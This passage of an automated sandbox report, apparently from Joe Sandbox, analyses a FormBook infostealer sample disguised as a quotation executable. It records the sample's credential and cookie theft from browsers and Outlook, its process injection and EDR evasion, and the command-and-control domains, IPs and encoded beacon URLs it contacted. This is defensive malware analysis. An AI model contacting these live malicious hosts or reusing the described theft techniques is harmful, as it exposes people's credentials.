                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: QUOTATON-37839993.exeBinary or memory string: WIN_81
                Source: QUOTATON-37839993.exeBinary or memory string: WIN_XP
                Source: QUOTATON-37839993.exeBinary or memory string: WIN_XPe
                Source: QUOTATON-37839993.exeBinary or memory string: WIN_VISTA
                Source: QUOTATON-37839993.exeBinary or memory string: WIN_7
                Source: QUOTATON-37839993.exeBinary or memory string: WIN_8
                Source: QUOTATON-37839993.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.2640000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.2640000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4008790036.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4008647896.0000000002CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2590442326.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E76283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00E76283
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E76747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E76747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569778 Sample: QUOTATON-37839993.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 28 www.sfantulandrei.info 2->28 30 www.mffnow.info 2->30 32 10 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 4 other signatures 2->48 10 QUOTATON-37839993.exe 2 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 FOBNeEFwBsF.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 comp.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 FOBNeEFwBsF.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 qqa79.top 38.47.233.21, 49857, 80 COGENT-174US United States 22->34 36 www.gk88top.top 104.21.7.187, 49899, 49905, 49912 CLOUDFLARENETUS United States 22->36 38 7 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                QUOTATON-37839993.exe47%ReversingLabsWin32.Trojan.AutoitInject
                QUOTATON-37839993.exe31%VirustotalBrowse
                QUOTATON-37839993.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.3kw40881107247y.click/yy0e/0%Avira URL Cloudsafe
                http://www.sfantulandrei.info/wvsm/0%Avira URL Cloudsafe
                http://www.sunnyz.store/ead0/0%Avira URL Cloudsafe
                http://www.qqa79.top/t67p/?T2M=Y0Z0G&KxZ=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK+0pIYn6OsKXO6mwWbUGH3YR5hyu6M0h3PqYDwJCf+R1lkRh9UQ=0%Avira URL Cloudsafe
                http://www.127358.win/2mep/?T2M=Y0Z0G&KxZ=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk/wMyoJJMo2d1H/wS+I5dkctw90/UWWKH7Hql+RyzctUTqPRuvs=0%Avira URL Cloudsafe
                http://www.gk88top.top/vjnn/0%Avira URL Cloudsafe
                http://www.gk88top.top/vjnn/?KxZ=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2C1TuTspqujhZjoi+NfkMLWXoMO10ul5nspQNZd1SB2qR4JUaa0=&T2M=Y0Z0G0%Avira URL Cloudsafe
                https://whois.gandi.net/en/results?search=sunnyz.store0%Avira URL Cloudsafe
                http://www.infohive.website/cnve/0%Avira URL Cloudsafe
                http://www.infohive.website/cnve/?KxZ=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVY2k1UguS5MLScqsLEwQyiaZDJDNhiwSLktxebIPhr8mPgUz4eag=&T2M=Y0Z0G0%Avira URL Cloudsafe
                http://www.mffnow.info/0pqe/0%Avira URL Cloudsafe
                http://www.3kw40881107247y.click0%Avira URL Cloudsafe
                https://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB100%Avira URL Cloudmalware
                http://www.sfantulandrei.info/wvsm/?T2M=Y0Z0G&KxZ=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2oBm3vCtx6xeHagKgyNNQL6/tdUVValn9agt9lf/uYkxXHUES57U=0%Avira URL Cloudsafe
                http://www.mffnow.info/0pqe/?KxZ=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywUHb6Ky4Osqfr3aB0kL6LN4sT6D7TOK7CTnegghrlX225G7BgQJc=&T2M=Y0Z0G0%Avira URL Cloudsafe
                http://www.muasamgiare.click/dc08/100%Avira URL Cloudmalware
                http://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z35TM8/OCjKyI0RRWf5xhtUunUrv8dIQZV5rCv+EV3icANGbLYtw=&T2M=Y0Z0G100%Avira URL Cloudmalware
                http://www.sunnyz.store/ead0/?KxZ=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBirmmsaQUUC+82V9qNTTK4Z1SvR6iko7BzlkPk6J7u5V/wAfiNkI=&T2M=Y0Z0G0%Avira URL Cloudsafe
                http://www.127358.win/2mep/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                qqa79.top
                		38.47.233.21
                		truetrue
                  		unknown
                  webredir.vip.gandi.net
                  		217.70.184.50
                  		truefalse
                    		high
                    www.127358.win
                    		206.238.89.119
                    		truefalse
                      		high
                      www.infohive.website
                      		66.29.149.46
                      		truetrue
                        		unknown
                        dns.ladipage.com
                        		13.228.81.39
                        		truefalse
                          		high
                          www.gk88top.top
                          		104.21.7.187
                          		truetrue
                            		unknown
                            www.mffnow.info
                            		172.67.178.93
                            		truetrue
                              		unknown
                              www.sfantulandrei.info
                              		199.59.243.227
                              		truetrue
                                		unknown
                                www.3kw40881107247y.click
                                		172.67.192.207
                                		truefalse
                                  		high
                                  www.muasamgiare.click
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.sunnyz.store
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.qqa79.top
                                      		unknown
                                      		unknownfalse
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.infohive.website/cnve/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.gk88top.top/vjnn/?KxZ=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2C1TuTspqujhZjoi+NfkMLWXoMO10ul5nspQNZd1SB2qR4JUaa0=&T2M=Y0Z0Gtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sfantulandrei.info/wvsm/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sunnyz.store/ead0/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.3kw40881107247y.click/yy0e/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.qqa79.top/t67p/?T2M=Y0Z0G&KxZ=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK+0pIYn6OsKXO6mwWbUGH3YR5hyu6M0h3PqYDwJCf+R1lkRh9UQ=true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.infohive.website/cnve/?KxZ=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVY2k1UguS5MLScqsLEwQyiaZDJDNhiwSLktxebIPhr8mPgUz4eag=&T2M=Y0Z0Gtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.gk88top.top/vjnn/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.127358.win/2mep/?T2M=Y0Z0G&KxZ=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk/wMyoJJMo2d1H/wS+I5dkctw90/UWWKH7Hql+RyzctUTqPRuvs=true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.mffnow.info/0pqe/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.mffnow.info/0pqe/?KxZ=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywUHb6Ky4Osqfr3aB0kL6LN4sT6D7TOK7CTnegghrlX225G7BgQJc=&T2M=Y0Z0Gtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sfantulandrei.info/wvsm/?T2M=Y0Z0G&KxZ=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2oBm3vCtx6xeHagKgyNNQL6/tdUVValn9agt9lf/uYkxXHUES57U=true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.127358.win/2mep/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sunnyz.store/ead0/?KxZ=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBirmmsaQUUC+82V9qNTTK4Z1SvR6iko7BzlkPk6J7u5V/wAfiNkI=&T2M=Y0Z0Gtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z35TM8/OCjKyI0RRWf5xhtUunUrv8dIQZV5rCv+EV3icANGbLYtw=&T2M=Y0Z0Gtrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.muasamgiare.click/dc08/true
                                        • Avira URL Cloud: malware
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabcomp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icocomp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://whois.gandi.net/en/results?search=sunnyz.storecomp.exe, 0000000D.00000002.4009464968.000000000474C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.000000000348C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.gandi.net/en/domaincomp.exe, 0000000D.00000002.4011130087.0000000006760000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.000000000474C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.000000000348C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://www.ecosia.org/newtab/comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgBcomp.exe, 0000000D.00000002.4009464968.00000000048DE000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.000000000361E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.comcomp.exe, 0000000D.00000002.4011130087.0000000006760000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000004A70000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.00000000037B0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://codepen.io/uzcho_/pens/popular/?grid_type=listcomp.exe, 0000000D.00000002.4009464968.00000000045BA000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.00000000032FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://www.3kw40881107247y.clickFOBNeEFwBsF.exe, 0000000E.00000002.4010692987.0000000004F08000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://codepen.io/uzcho_/pen/eYdmdXw.csscomp.exe, 0000000D.00000002.4009464968.00000000045BA000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.00000000032FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcomp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.aapanel.com/new/download.html?invite_code=aapanelecomp.exe, 0000000D.00000002.4009464968.0000000004296000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.0000000002FD6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    38.47.233.21
                                                                    		qqa79.topUnited States
                                                                    		174COGENT-174UStrue
                                                                    172.67.192.207
                                                                    		www.3kw40881107247y.clickUnited States
                                                                    		13335CLOUDFLARENETUSfalse
                                                                    104.21.7.187
                                                                    		www.gk88top.topUnited States
                                                                    		13335CLOUDFLARENETUStrue
                                                                    199.59.243.227
                                                                    		www.sfantulandrei.infoUnited States
                                                                    		395082BODIS-NJUStrue
                                                                    172.67.178.93
                                                                    		www.mffnow.infoUnited States
                                                                    		13335CLOUDFLARENETUStrue
                                                                    217.70.184.50
                                                                    		webredir.vip.gandi.netFrance
                                                                    		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                                    13.228.81.39
                                                                    		dns.ladipage.comUnited States
                                                                    		16509AMAZON-02USfalse
                                                                    66.29.149.46
                                                                    		www.infohive.websiteUnited States
                                                                    		19538ADVANTAGECOMUStrue
                                                                    206.238.89.119
                                                                    		www.127358.winUnited States
                                                                    		174COGENT-174USfalse

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1569778
                                                                    Start date and time:2024-12-06 10:03:36 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 9m 58s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Run name:Run with higher sleep bypass
                                                                    Number of analysed new started processes analysed:14
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:2
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:QUOTATON-37839993.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@11/9
                                                                    EGA Information:
                                                                    • Successful, ratio: 75%
                                                                    HCA Information:
                                                                    • Successful, ratio: 96%
                                                                    • Number of executed functions: 53
                                                                    • Number of non-executed functions: 276
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target FOBNeEFwBsF.exe, PID 3204 because it is empty
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    No simulations

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    38.47.233.21CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                    • www.qqa79.top/dp98/
                                                                    172.67.192.207ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                    • www.3kw40881107247y.click/8292/
                                                                    Quotation.exeGet hashmaliciousFormBookBrowse
                                                                    • www.3kw40881107247y.click/6wln/
                                                                    payments.exeGet hashmaliciousFormBookBrowse
                                                                    • www.3kw40881107247y.click/6wln/
                                                                    Company Profile.exeGet hashmaliciousFormBookBrowse
                                                                    • www.boutiquedangel.com/dc02/?1bNDudv=lPUNoWBtPBWln2k83/A+IJ2u5ZORNmo56U/+UDfBdKbmjZvt5t3YeH5qDhFjWklukbBx&Tp=NBZl4DOPndid
                                                                    104.21.7.187purchase order.exeGet hashmaliciousFormBookBrowse
                                                                    • www.gk88top.top/4gxa/
                                                                    attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                    • www.gk88top.top/4gxa/
                                                                    199.59.243.227lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                    • www.bcg.services/5onp/
                                                                    New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                    • www.bcg.services/5onp/
                                                                    SRT68.exeGet hashmaliciousFormBookBrowse
                                                                    • www.acond-22-mvr.click/9qaj/
                                                                    ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                    • www.dating-ml-es.xyz/pvrm/
                                                                    bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                    • www.sql.dance/9p84/
                                                                    SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                    • www.whisperart.net/27s6/
                                                                    Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590
                                                                    1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • www.honk.city/c8xp/
                                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                    • www.bcg.services/xz45/
                                                                    W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • www.acond-22-mvr.click/w9z4/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    webredir.vip.gandi.netPO# 81136575.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                    • 217.70.184.50
                                                                    Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.70.184.50
                                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.70.184.50
                                                                    statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.70.184.50
                                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.70.184.50
                                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.70.184.50
                                                                    XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.70.184.50
                                                                    SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.70.184.50
                                                                    #10302024.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.70.184.50
                                                                    rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.70.184.50
                                                                    dns.ladipage.comNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.179.173.60
                                                                    Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 18.139.62.226
                                                                    XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 13.228.81.39
                                                                    Swift copy.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.179.173.60
                                                                    COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 54.179.173.60
                                                                    7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.179.173.60
                                                                    Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.179.173.60
                                                                    www.127358.winlgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                    • 206.238.89.119
                                                                    Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                    • 206.238.89.119
